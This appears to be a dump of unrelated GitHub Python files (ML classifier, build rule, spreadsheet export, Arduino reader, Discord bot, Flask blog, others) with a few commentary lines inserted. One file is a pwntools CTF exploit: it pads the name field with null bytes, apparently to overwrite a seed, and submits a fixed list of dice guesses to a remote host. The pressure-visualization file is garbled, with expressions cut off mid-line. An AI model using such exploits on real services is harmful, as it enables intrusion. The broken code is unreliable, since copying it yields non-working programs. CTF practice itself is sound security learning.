temp[j];\r\n temp2 = [0 for i in range(0,n-i-1)];\r\n for i1 in range(0,j):\r\n temp2[i1] = temp[i1];\r\n for i2 in range(j+1,n-i):\r\n temp2[i2-1] = temp[i2];\r\n temp = temp2;\r\n result[i] = t1;\r\n return list(np.sort(result));\r\n\r\ndef main():\r\n infile = open(\"C:\\\\gmail_api\\\\read_data.txt\",'rb')\r\n XT = pickle.load(infile)\r\n infile.close()\r\n infile = open(\"C:\\\\gmail_api\\\\unread_data.txt\",'rb')\r\n XF = pickle.load(infile)\r\n infile.close()\r\n Y = [1 for i in range(0,len(XT))];\r\n for row in XF:\r\n XT.append(row);\r\n Y.append(0);\r\n X = XT;\r\n\r\n Xtrain, Ytrain, Xtest, Ytest = train_test_split(X,Y,frac=0.8);\r\n\r\n bayes = naive_bayes(num_features=5,num_classes=3);\r\n bayes.train(Xtrain,Ytrain);\r\n\r\n\r\n Ypred = bayes.predict(Xtest);\r\n\r\n acc = evaluate_accuracy(Ypred,Ytest);\r\n print(acc);\r\n\r\nif __name__ == '__main__':\r\n main();\r\n","repo_name":"pd451/Machine-Learning","sub_path":"ML/Naive 
Bayes/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
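+A toy run of the classifier above on categorical features. Two quirks are worth knowing: there is no smoothing, so a feature value never seen for a class zeroes that class out, and predict computes its prior from the size of the set being predicted rather than the training set. The expected output below is a hand-traced sketch, not a guarantee:
+
+X = [['red', 'round'], ['red', 'round'], ['green', 'long'], ['green', 'round']]
+Y = [0, 0, 1, 1]
+
+clf = naive_bayes(num_features=2, num_classes=2)
+clf.train(X, Y)
+print(clf.predict([['red', 'round'], ['green', 'long']]))  # expected [0 1]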
+{"seq_id":"38382766991","text":"import shlex\nimport textwrap\nfrom dataclasses import dataclass\nfrom typing import Optional, Tuple\n\nfrom pants.backend.go.distribution import GoLangDistribution\nfrom pants.core.util_rules.external_tool import DownloadedExternalTool, ExternalToolRequest\nfrom pants.engine.fs import CreateDigest, Digest, FileContent, MergeDigests\nfrom pants.engine.internals.selectors import Get\nfrom pants.engine.platform import Platform\nfrom pants.engine.process import BashBinary, Process\nfrom pants.engine.rules import collect_rules, rule\nfrom pants.util.logging import LogLevel\n\n\n@dataclass(frozen=True)\nclass GoSdkProcess:\n input_digest: Digest\n command: Tuple[str, ...]\n description: str\n working_dir: Optional[str] = None\n output_files: Tuple[str, ...] = ()\n output_directories: Tuple[str, ...] = ()\n\n\n@rule\nasync def setup_go_sdk_command(\n request: GoSdkProcess,\n goroot: GoLangDistribution,\n bash: BashBinary,\n) -> Process:\n downloaded_goroot = await Get(\n DownloadedExternalTool,\n ExternalToolRequest,\n goroot.get_request(Platform.current),\n )\n\n working_dir_cmd = f\"cd '{request.working_dir}'\" if request.working_dir else \"\"\n\n # Note: The `go` tool requires GOPATH to be an absolute path which can only be resolved from within the\n # execution sandbox. Thus, this code uses a bash script to be able to resolve absolute paths inside the sandbox.\n script_digest = await Get(\n Digest,\n CreateDigest(\n [\n FileContent(\n \"__pants__.sh\",\n textwrap.dedent(\n f\"\"\"\\\n export GOROOT=\"$(/bin/pwd)/go\"\n export GOPATH=\"$(/bin/pwd)/gopath\"\n export GOCACHE=\"$(/bin/pwd)/cache\"\n /bin/mkdir -p \"$GOPATH\" \"$GOCACHE\"\n {working_dir_cmd}\n exec \"${{GOROOT}}/bin/go\" {' '.join(shlex.quote(arg) for arg in request.command)}\n \"\"\"\n ).encode(\"utf-8\"),\n )\n ]\n ),\n )\n\n input_root_digest = await Get(\n Digest,\n MergeDigests([downloaded_goroot.digest, script_digest, request.input_digest]),\n )\n\n return Process(\n argv=[bash.path, \"__pants__.sh\"],\n input_digest=input_root_digest,\n description=request.description,\n output_files=request.output_files,\n output_directories=request.output_directories,\n level=LogLevel.DEBUG,\n )\n\n\ndef rules():\n return collect_rules()\n","repo_name":"williamscs/pants","sub_path":"src/python/pants/backend/go/sdk.py","file_name":"sdk.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"36025460683","text":"import json\nfrom math import ceil\nfrom typing import Dict, List\n\nfrom openpyxl import Workbook\nfrom openpyxl.utils import get_column_letter\nfrom openpyxl.worksheet.table import Table, TableStyleInfo\n\nfrom arbitrageur.crafting import ProfitableItem, profit_per_item, profit_on_cost, profit_per_crafting_step\nfrom arbitrageur.items import Item\nfrom arbitrageur.recipes import Recipe, ITEM_STACK_SIZE\n\nimport csv\nfrom logzero import logger\n\n\ndef format_disciplines(disciplines: List[str]) -> str:\n # Returns the first letter of each discipline, except for Armorsmith (Am) & Artificer (At)\n return \"/\".join([e[0] if e[0] != 'A' else e[:3:2] for e in disciplines])\n\n\ndef format_json_recipe(profitable_item, items_map):\n logger.debug(\n f\"\"\"Shopping list for {profitable_item.count} x {items_map[profitable_item.id].name} = {profitable_item.profit} profit ({profit_per_crafting_step(profitable_item)} / step) :\"\"\")\n\n recipe = {}\n for ingredient_id, purchased_ingredient in profitable_item.purchased_ingredients.items():\n ingredient_count = ceil(purchased_ingredient.count)\n if ingredient_count < ITEM_STACK_SIZE:\n ingredient_count_msg = str(ingredient_count)\n else:\n stack_count = ingredient_count // ITEM_STACK_SIZE\n remainder = ingredient_count % ITEM_STACK_SIZE\n if remainder != 0:\n remainder_msg = f\"\"\" + {remainder}\"\"\"\n else:\n remainder_msg = \"\"\n\n ingredient_count_msg = f\"\"\"{ingredient_count} ({stack_count} x {ITEM_STACK_SIZE}{remainder_msg})\"\"\"\n\n ingredient_name = items_map[ingredient_id].name\n logger.debug(\n f\"\"\"{ingredient_count_msg} {ingredient_name} ({ingredient_id}) for {purchased_ingredient.cost}\"\"\")\n\n recipe[f\"\"\"{ingredient_count_msg} {ingredient_name}\"\"\"] = purchased_ingredient.listings\n return recipe\n\n\ndef generate_export_rows(items_map, profitable_items, recipes_map):\n profitable_items = [e for e in profitable_items if e.profit != 0]\n data = []\n for profitable_item in profitable_items:\n item_id = profitable_item.id\n item = items_map[item_id]\n recipe = recipes_map[item_id]\n\n item_data = {\n 'id': item_id,\n 'name': item.name,\n 'rarity': item.rarity,\n 'disciplines': format_disciplines(recipe.disciplines),\n 'profit': profitable_item.profit,\n 'crafting_cost': profitable_item.crafting_cost,\n 'count': profitable_item.count,\n 'avg_profit_per_item': profit_per_item(profitable_item),\n 'roi': float(profit_on_cost(profitable_item)),\n 'link': f\"\"\"=HYPERLINK(\"https://www.gw2bltc.com/en/item/{item.id}\")\"\"\",\n # TODO: This returns the \"total\" minimal sell price instead of the minimal sell price per item\n 'profitability_threshold': profitable_item.profitability_threshold,\n 'time_gated': profitable_item.time_gated,\n 'needs_ascended': profitable_item.needs_ascended,\n 'craft_level': recipe.min_rating,\n 'recipe': json.dumps(format_json_recipe(profitable_item, items_map), indent=2)\n }\n\n data.append(item_data)\n return data\n\n\ndef export_csv(profitable_items: List[ProfitableItem],\n items_map: Dict[int, Item],\n recipes_map: Dict[int, Recipe]) -> None:\n logger.info(\"Exporting profitable items as CSV\")\n data = generate_export_rows(items_map, profitable_items, recipes_map)\n if len(data) == 0:\n logger.warning(\"Could not find any profitable item to export\")\n return\n\n with open('export.csv', 'w', newline='') as csvfile:\n datawriter = csv.writer(csvfile, delimiter=',', quotechar='\"')\n datawriter.writerow(data[0].keys())\n\n for item_data in data:\n 
datawriter.writerow(item_data.values())\n\n\ndef get_series_letter(name: str, data: List[dict]) -> str:\n return get_column_letter(list(data[0].keys()).index(name) + 1)\n\n\ndef as_text(value):\n if value is None:\n return \"\"\n return str(value)\n\n\ndef export_excel(profitable_items: List[ProfitableItem],\n items_map: Dict[int, Item],\n recipes_map: Dict[int, Recipe],\n time_gated: bool = False,\n needs_ascended: bool = False) -> None:\n logger.info(\"Exporting profitable items as Excel spreadsheet\")\n data = generate_export_rows(items_map, profitable_items, recipes_map)\n if len(data) == 0:\n logger.warning(\"Could not find any profitable item to export\")\n return\n\n wb = Workbook()\n ws = wb.active\n\n # add column headings. NB. these must be strings\n ws.append(list(data[0].keys()))\n for row in data:\n if (time_gated or not row['time_gated']) and (needs_ascended or not row['needs_ascended']):\n ws.append(list(row.values()))\n\n tab = Table(displayName=\"Data\", ref=\"A1:\" + get_column_letter(ws.max_column) + str(ws.max_row))\n\n # Add a default style with striped rows and banded columns\n style = TableStyleInfo(name=\"TableStyleMedium9\", showFirstColumn=False,\n showLastColumn=False, showRowStripes=True, showColumnStripes=True)\n tab.tableStyleInfo = style\n\n ws.add_table(tab)\n\n # Applies formatting (format can only be applied to single cells)\n for col_name, number_format in {'profit': r\"#\\,##\\,##\",\n 'crafting_cost': r\"#\\,##\\,##\",\n 'avg_profit_per_item': r\"#\\,##\\,##\",\n 'roi': '0.00%',\n 'profitability_threshold': r\"#\\,##\\,##\"}.items():\n col_letter = get_series_letter(col_name, data)\n\n for i in range(1, ws.max_row + 1):\n ws[f\"{col_letter}{i}\"].number_format = number_format\n\n # Adjusts column width\n col_dim = [\n ('id', 8),\n ('name', 30),\n ('rarity', 5),\n ('disciplines', 10),\n ('profit', 10),\n ('crafting_cost', 11),\n ('count', 10),\n ('avg_profit_per_item', 8),\n ('roi', 7),\n ('link', 5),\n ('profitability_threshold', 8),\n ('time_gated', 7),\n ('needs_ascended', 7),\n ('craft_level', 5),\n ('recipe', 80)\n ]\n for i, column_cells in enumerate(ws.columns):\n ws.column_dimensions[column_cells[0].column_letter].width = col_dim[i][1]\n\n wb.save(\"export.xlsx\")\n","repo_name":"Ziink4/Arbitrageur","sub_path":"arbitrageur/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":6725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
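+A quick illustration of the slicing trick in format_disciplines: e[:3:2] keeps characters 0 and 2 of the name, so the two professions starting with 'A' stay distinguishable:
+
+print(format_disciplines(["Armorsmith", "Artificer", "Weaponsmith"]))
+# Am/At/W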
+{"seq_id":"41950920052","text":"from pyfirmata import Arduino, util\nimport pyfirmata\nfrom time import sleep\n\nfrom mqtt_lib import Communicator\n\nboard = Arduino('/dev/serial/by-id/usb-1a86_USB2.0-Serial-if00-port0') # Nano\n#board = Arduino('/dev/serial/by-id/usb-Arduino__www.arduino.cc__0043_55432333038351E0F022-if00') # Uno\nprint('Connected')\n\n\nvalue = board.get_pin('d:4:i') # type: pyfirmata.Pin\n\nit = util.Iterator(board)\nit.start()\nboard.iterate()\n\nPIN_MODE_PULLUP = 0x0B\n\nmsg = bytearray([pyfirmata.SET_PIN_MODE, value.pin_number, PIN_MODE_PULLUP])\nvalue.board.sp.write(msg)\n\nc = Communicator()\n\nwhile True:\n input = value.read()\n if input == True:\n print('Switch is High')\n c.send_message(True, True)\n else:\n print('Switch is Low')\n c.send_message(False, False)\n sleep(0.1)\n# for i in range (1000):\n# print('Switch State: %s')% value.read()\n# if str(value.read()) == 'True':\n# print('High')\n# if str(value.read()) == 'False':\n# print('Low')\n#print(value.read())\n # if(dig_pin.read()== 1):\n # print('High')\n # if (dig_pin.read()== 0):\n # print('Low')\n\nboard.exit()","repo_name":"OlinSibbSquad/oh-shoot","sub_path":"Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25474384977","text":"import random\nimport math\nimport os\n\nbase_list = [\"Laitue\", \"Mesclun\", \"Mâche\", \"Pousse d'épinard\", \"Roquette\", \"Fusilli/Mesclun\", \"Riz/Roquette\",\n \"Quinoa Boulgour/Roquette\", \"Fusili\", \"Riz\"]\ningredients_list = [\"Melon\", \"Ananas\", \"Aubergines\", \"Concombres\", \"Falafel\", \"Champignons\", \"Courgettes\", \"Mais\", \"Oignons rouges\", \"Poivrons\",\n \"Tomates cerises allongees\", \"Tomates cerises confites\", \"Edamame\", \"Olives vertes\", \"Emmental\",\"Feta\", \"Fromage de chevre\", \"Roquefort\",\n \"Grana Padano\", \"Mozzarella\", \"Mozarella di Bufala\", \"Tomme de brebis\", \"Mimolette\", \"Oeuf Poche\",\"Jambon blanc\", \"Jambon de pays\", \"Bacon grille\",\n \"Anchois\", \"Crevettes\", \"Surimi\", \"Saumon Fume\", \"Thon\", \"Crouton\", \"Graines\", \"Noix\"]\nsauce_list = [\"Moutarde a l'ancienne\", \"Miel Moutarde\", \"Ranch\", \"Olive balsamique\", \"Soja\", \"Tomates basilic\",\n \"Olive citron\", \"Pesto\", \"Agrumes\", \"Curry Coco\"]\nnb_ingr = 4\n\n\ndef mixer (list):\n i = random.randint(0, len(list) - 1)\n return list[i]\n\n\ndef display(base, sauce, ingredients):\n print(\n \"++++VOTRE SALADE EST PRETE+++++\\nBase: \", base,\n \"\\nSauce: \", sauce, \"\\nIngredients: \"\n )\n for i in ingredients:\n print(\" \", i)\n return 0\n\n\ndef formule ():\n foo = input(\"Combien d'ingredients dans la salade ? (4/6): \")\n if int(foo) == 4 or int(foo) == 6:\n global nb_ingr\n nb_ingr = int(foo)\n os.system('cls')\n menu()\n else:\n print(\"\\nMerci de choisir entre 4 ou 6 ingredients\")\n formule()\n\n\ndef menu ():\n while True:\n os.system('cls')\n print(\"++++ SaladMixrr1.0 ++++\\n\"\n \"Formule: \", nb_ingr, \" ingredients\\n\"\n \"1. Changer la quantite d'ingredients\\n\"\n \"2. Mixer !\\n\"\n \"3. Quitter\\n\"\n )\n saisie = int(input(\"Choisissez une option: \"))\n if saisie == 1:\n return formule()\n if saisie == 2:\n os.system('cls')\n recette()\n break\n if saisie == 3:\n print(\"Bye !\")\n return 0\n else:\n menu()\n\n\ndef recette ():\n base = mixer(base_list)\n ingredients = [mixer(ingredients_list)]\n sauce = [mixer(sauce_list)]\n switch = True\n while len(ingredients) < nb_ingr:\n foo = mixer(ingredients_list)\n for i in ingredients:\n if foo == i:\n switch = False\n if switch:\n ingredients.append(foo)\n else:\n switch = True\n display(base, sauce, ingredients)\n waiter()\n\n\ndef waiter ():\n happy = input(\"\\nSatisfait ? Y/N/(M)enu: \")\n if (happy.upper() == \"Y\"):\n print(\"Yummy !\")\n return 0\n if (happy.upper() == \"N\"):\n os.system('cls')\n return recette()\n if (happy.upper() == \"M\"):\n os.system('cls')\n return menu()\n else:\n print(\"Reponse invalide\")\n waiter()\n\n\nif __name__ == '__main__' :\n menu()\n","repo_name":"0xPhantasia/EatSaladRandomizer","sub_path":"SaladMixrr.py","file_name":"SaladMixrr.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"32842426789","text":"import cv2\nimport CameraReaderAsync\n\n# Initialize\ndebugMode = True\ncamera = cv2.VideoCapture(0)\ncamera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 640)\ncamera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 480)\ncameraReader = CameraReaderAsync.CameraReaderAsync(camera)\n\n# Main Loop\nframesToProcess = 60 * 5\nwhile debugMode or framesToProcess >= 0:\n raw = cameraReader.Read()\n if raw is not None:\n framesToProcess -= 1\n if debugMode:\n cv2.imshow(\"raw\", raw)\n\n if debugMode:\n keyPress = cv2.waitKey(1)\n if keyPress == ord(\"q\"):\n break\n \n# Cleanup\ncameraReader.Stop()\ncamera.release()\ncv2.destroyAllWindows()\n","repo_name":"AluminatiFRC/Vision2016","sub_path":"multiproc-test.py","file_name":"multiproc-test.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"12378975341","text":"#!/usr/bin/env python2\n\nfrom pwn import *\nfrom qpwn import *\ncontext(os='linux', log_level='debug')\ncontext.arch = 'amd64'\ncontext.terminal = ['tmux', 'splitw', '-h']\n\nif args.INFO:\n context.log_level = 'info'\n \nDEBUG = not args.REMOTE and not args.TEST\nif args.REMOTE:\n p = remote('111.198.29.45', 52224)\nelif args.TEST:\n p = process('./pwn', env={'LD_PRELOAD': './libc.so.6'})\nelse:\n p = process('./pwn')\nelf = ELF('./pwn')\ninit(p, elf, context, args)\nmake_alias(p)\n\ndef guess(ans):\n p.sla('Give me the point(1~6):', str(ans))\n\nif __name__ == '__main__':\n p.sla('name', '\\x00' * 0x50)\n ls = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]\n for i in ls:\n guess(i)\n p.i()\n","repo_name":"qaqmander/ctf-history","sub_path":"xman_execrise/pwn/dice_game/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"25691925283","text":"import discord\r\nimport random\r\nimport sys\r\n\r\n\r\nclient = discord.Client()\r\nrandom_greeting = [\"Hello\", \"Hi\", \"YO!\", \"Sup!\"]\r\nrandom_answer = [\"Maybe\", \"Try again later\", \"Sure\", \"Definitely\", \"I doubt that\", \"Yes\", \"No\", \"No chance for that to happen\"]\r\n\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f\"We have logged in as {client.user}\")\r\n '''\r\n Use this if you want to find the id of a custom emoji so you can use it as an reaction\r\n for emoji in client.emojis:\r\n print(emoji.id)\r\n print(emoji.name)'''\r\n\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n print(f\"{message.channel}: {message.author}: {message.author.name}: {message.content}\")\r\n \r\n if message.author == client.user:\r\n return\r\n \r\n if \"hello\" in message.content.lower():\r\n await message.channel.send(random.choice(random_greeting))\r\n\r\n if \"happy birthday\" in message.content.lower():\r\n await message.channel.send(\"Happy Birthday!\")\r\n\r\n if \"!byebot\" in message.content.lower():\r\n await client.close()\r\n sys.exit()\r\n\r\n if \"!tellmebot\" in message.content.lower():\r\n await message.channel.send(random.choice(random_answer))\r\n\r\n '''if \"trigger\" in message.content.lower():\r\n emoji = client.get_emoji(emojiid)\r\n await message.add_reaction(emoji)'''\r\n\r\n \r\n\r\nclient.run(\"your token goes here\")","repo_name":"StaVergos/discord.py","sub_path":"discordbot.py","file_name":"discordbot.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9121315402","text":"#display the message\nprint(\"How many numbers should i sum up?\")\nmax_numbers = int(input())\n\n#variable to control the loop\ncount = 0\n\nprint()\n\n#total of summed number\ntotal = 0\n\nwhile count < max_numbers:\n print(f\"please enter a number {count + 1} of {max_numbers}:\")\n number = int(input())\n total = total + number\n count = count + 1\nprint(f\"the answer is {total}\")","repo_name":"beniewaku/com728","sub_path":"basics/repetitions/while_loop/sum_user_numbers.py","file_name":"sum_user_numbers.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"279718613","text":"import json\r\nimport os\r\nimport tensorflow as tf \r\nimport numpy as np \r\n\r\ndef load_json_file(file_path: str):\r\n \"\"\"\r\n Load json file by file path\r\n :param file_path: path to json file\r\n :return: json object\r\n \"\"\"\r\n assert os.path.exists(file_path), \"{} is not existed\".format(file_path)\r\n with open(file_path) as f:\r\n json_file = json.load(f)\r\n return json_file\r\n\r\ndef predict(data: np.ndarray, model: tf.keras.Model) -> np.ndarray:\r\n \"\"\"\r\n Perform prediction on specific model\r\n :param data: data for prediction\r\n :param model: DL model for prediction\r\n :return:\r\n \"\"\"\r\n results = model.predict(data.reshape(-1, 28, 28, 1))\r\n # clear up session\r\n tf.keras.backend.clear_session()\r\n return results\r\n\r\ndef sort_by_confidence_then_filter_top_n(prediction_results: np.ndarray, top_n: int) -> np.ndarray:\r\n \"\"\"\r\n - sort the prediction by confidences score\r\n - flip it from highest to lowest\r\n - filter out top N predictions\r\n - stack them back together\r\n :param prediction_results:\r\n :param top_n:\r\n :return:\r\n \"\"\"\r\n result_argsort = np.flip(prediction_results.argsort()[:, -top_n:], 1)\r\n result_sort = np.flip(np.sort(prediction_results)[:, -top_n:], 1)\r\n result_stack = np.dstack((result_argsort, result_sort))\r\n return result_stack\r\n ","repo_name":"anoyo-lin/digits_ocr","sub_path":"gene/digits_ocr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2452630550","text":"import numpy as np\nimport pandas as pd\nimport csv\nimport cv2\nimport matplotlib.pyplot as plt\nimport datetime\n\n##########\n# global variables\nfigure, ax = plt.subplots(nrows=2, ncols=1, sharex=True, figsize=(8, 6))\ndrawing = False\nx0=0\ny0=0\nx1=0\ny1=0\n# global variables\n##########\n\n\ndef resize_img(img):\n # print('Original Dimensions : ',img.shape)\n \n scale = 10 # percent of original size\n width = int(img.shape[1] * scale)\n height = int(img.shape[0] * scale)\n dim = (width, height)\n \n # resize image\n resized = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n \n # print('Resized Dimensions : ',resized.shape)\n return resized\n\n\ndef average_data(df_head, raw_data):\n # averaging of frames per second; 2 or 3 FPS (2Hz or 3Hz) will become 1 FPS 1Hz\n\n data_mean=np.array([],dtype=float).reshape(0, raw_data.shape[1], raw_data.shape[2])\n data_time=[]\n\n id_sel=0\n # print(len(raw_data))\n while id_sel < len(raw_data):\n sel_hour=df_head['hour'].values[id_sel]\n # print(\"df['hour'].values[0]: \", sel_hour)\n \n hour_splitted = datetime.datetime.strptime(sel_hour, \"%H:%M:%S.%f\")\n h=hour_splitted.hour\n m=hour_splitted.minute\n s=hour_splitted.second\n\n h_inf =str(h).zfill(2)\n m_inf =str(m).zfill(2)\n s_inf =str(s).zfill(2)\n \n if s+1==60:\n s_sup=str(0).zfill(2)\n if m+1==60:\n m_sup=str(0).zfill(2)\n h_sup=str(h+1).zfill(2)\n else:\n m_sup=str(m+1).zfill(2)\n h_sup=str(h).zfill(2)\n else:\n s_sup=str(s+1).zfill(2)\n m_sup=str(m).zfill(2)\n h_sup=str(h).zfill(2)\n \n # u_sec = str(hour_splitted.microsecond)\n # print(hour+':'+min+':'+sec_inf+'.'+u_sec)\n\n lim_inf = h_inf+':'+m_inf+':'+s_inf\n lim_sup = h_sup+':'+m_sup+':'+s_sup\n\n # print('lim_inf, lim_sup: ', lim_inf, lim_sup)\n\n idx_s = df_head.loc[(df_head['hour']>= lim_inf) & (df_head['hour']=time_ini) & (df_chest[' Time']<=time_end)]\n df_thigh_a = df_thigh.loc[(df_thigh[' Time']>=time_ini) & (df_thigh[' Time']<=time_end)]\n \n # activate interactive mouse actions on window\n cv2.namedWindow('image')\n cv2.setMouseCallback('image',mouse_interact)\n\n # to run GUI event loop\n plt.ion()\n plt.show()\n\n id_frame=0\n exit_key=False\n flag =True\n flag_start=True\n\n\n while (exit_key==False) and (id_frame 255.0]=255.0\n s_f = s_f.astype(np.uint8)\n s_f=resize_img(s_f)\n \n colormap = plt.get_cmap('plasma')\n heatmap = (colormap(s_f) * 2**16).astype(np.uint16)[:,:,:3]\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_RGB2BGR)\n\n cv2.imshow('image',heatmap)\n\n # plot_actigraphy(df_chest_a.iloc[0:id_frame][vec_mag].to_numpy(), df_thigh_a.iloc[0:id_frame][vec_mag].to_numpy())\n plot_actigraphy(df_chest_a[vec_mag].to_numpy(), df_thigh_a[vec_mag].to_numpy(), id_frame)\n\n if flag_start == True:\n pressed_key = cv2.waitKey(0) # miliseconds\n flag_start=False\n else:\n pressed_key = cv2.waitKey(100) # miliseconds\n\n if pressed_key == ord('a'):\n print (\"pressed a\")\n exit_key=True\n else:\n print('id frame: ', id_frame, df_f.iloc[id_frame]['time_stamp'])\n id_frame+=1\n \n cv2.waitKey(0)\n cv2.destroyAllWindows()\n","repo_name":"gtibap/actigraph_hscm","sub_path":"scripts/interface_pressure_visualization_2.py","file_name":"interface_pressure_visualization_2.py","file_ext":"py","file_size_in_byte":6786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24157699854","text":"import os\nimport time\n\nfrom celery import Celery\n\n\ncelery = Celery(__name__)\ncelery.conf.broker_url = os.environ.get(\n \"CELERY_BROKER_URL\", \"redis://localhost:6379\")\ncelery.conf.result_backend = os.environ.get(\n \"CELERY_RESULT_BACKEND\", \"redis://localhost:6379\")\n\n# celery task\n\n\n@celery.task(name='add')\ndef add(x, y):\n return x + y\n","repo_name":"Shebeli/BattleShipPy","sub_path":"api/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"4389909428","text":"#!/usr/bin/python3\n\ndef list_division(my_list_1, my_list_2, list_length):\n \"\"\"\n Performs contigeous divisions\n Args:\n my_list_1: first list\n my_list_2: divisors\n list_length: length of lists\n Returns: List of divisions\n \"\"\"\n divs = []\n for i in range(0, list_length):\n try:\n fraction = my_list_1[i] / my_list_2[i]\n except TypeError:\n print(\"wrong type\")\n fraction = 0\n except ZeroDivisionError:\n print(\"division by 0\")\n fraction = 0\n except IndexError:\n print(\"out of range\")\n fraction = 0\n finally:\n divs.append(fraction)\n return divs\n","repo_name":"sayyid211/alx-higher_level_programming_0","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8685177755","text":"# Define a function to print out messages one by one\ndef question1():\n \"\"\"The first question bot ask user\"\"\"\n # Create a tuple of the messages for question 1\n question_1 = ((\"Hi! Welcome to Tyler's Repair shop.\"),\n ('What can I help you with? (please chose 1, 2, or 3)'),\n ('1. Make an appointment'),\n ('2. Check your appointment'),\n ('3. Cancel your appointment'))\n for i in question_1:\n print(i)\n\n# Define a function to print out messages one by one \ndef question11():\n \"\"\"The second question bot ask user\"\"\"\n #Create a tuple of the messages for the second question when user give answer \"1\" in question 1.\n question_1_1 = (('What kind of service do you need?(please chose 1, 2, or 3)'),\n ('1. Tire replacement'),\n ('2. Bumper replacement'),\n ('3. Light replacement'))\n for i in question_1_1:\n print(i)\n\n# Write a funtion to make different appointments use add_appointment method of the class reservation_list\ndef add_appoint():\n \"\"\"add appointment for user with method created\"\"\"\n from my_module.reservation import reservation_list as p\n from my_module.reservation import remove_key\n r = p()\n # Define the third question after user choose the answers from second question\n question_1_1_1 = ('Please enter the appointment time you want to make (please choose the number)')\n # Ask the second question\n question11()\n # Let user answer the question\n msg1_1 = input('INPUT :\\t')\n \n # If the answer is '1', show user the avaliable times\n if msg1_1 == '1':\n print(question_1_1_1)\n r.check_avaliable()\n # Add an appointment using add_appointment method with job name 'Tire replacement'\n msg1_1_1 = input('INPUT :\\t')\n r.add_appointment('Tire replacement', msg1_1_1)\n \n # If the answer is '2', show user the avaliable times \n elif msg1_1 == '2':\n print(question_1_1_1)\n r.check_avaliable()\n # Add an appointment using add_appointment method with job name 'Bumper replacement'\n msg1_1_2 = input('INPUT :\\t')\n r.add_appointment('Bumper replacement', msg1_1_2)\n \n # If the answer is '3', show user the avaliable times\n elif msg1_1 == '3':\n print(question_1_1_1)\n r.check_avaliable()\n #Add an appointment using add_appointment method with job name 'Light replacement' \n msg1_1_3 = input('INPUT :\\t')\n r.add_appointment('Light replacement', msg1_1_3) \n \n # If the answer is unvalid, report error.\n else:\n print(\"Sorry, I can't understand you. please call (888)888-8888\")","repo_name":"brn016/cogs18","sub_path":"18 Projects/Project_yax048_attempt_2018-12-12-10-21-46_COGS 18 Final Project/COGS 18 Final Project/my_module/add_appointment.py","file_name":"add_appointment.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24450336952","text":"from flask import Flask, render_template\nfrom faker import Faker\nimport random\n\nfake = Faker()\n\napp = Flask(__name__)\napplication = app\n\nimages = ['7d4e9175-95ea-4c5f-8be5-92a6b708bb3c',\n '2d2ab7df-cdbc-48a8-a936-35bba702def5',\n '6e12f3de-d5fd-4ebb-855b-8cbc485278b7',\n 'afc2cfe7-5cac-4b80-9b9a-d5c65ef0c728',\n 'cab5b7f2-774e-4884-a200-0c0180fa777f']\n\n\ndef generate_comments(replies=True):\n comments = []\n for i in range(random.randint(1, 3)):\n comment = { 'author': fake.name(), 'text': fake.text() }\n if replies:\n comment['replies'] = generate_comments(replies=False)\n comments.append(comment)\n return comments\n\n\ndef generate_post(i):\n return {\n 'title': 'Заголовок поста',\n 'author': fake.name(),\n 'text': fake.paragraph(nb_sentences=100),\n 'date': fake.date_time_between(start_date='-2y', end_date='now'),\n 'image_id': f'{images[i]}.jpg',\n 'comments': generate_comments()\n }\n\n\nposts_list = sorted([generate_post(i) for i in range(5)], key=lambda x: x['date'], reverse=True)\n\n\n@app.route('/')\ndef index():\n title = 'Главная!'\n return render_template('index.html', title=title)\n\n\n@app.route('/posts')\ndef posts():\n title = 'Посты!'\n return render_template('posts.html', title=title, posts=posts_list)\n\n\n@app.route('/post/')\ndef post(i):\n p = posts_list[i]\n return render_template('post.html', title=p['title'], post=p)\n\n\n@app.route('/about')\ndef about():\n title = 'Обо мне!'\n return render_template('about.html', 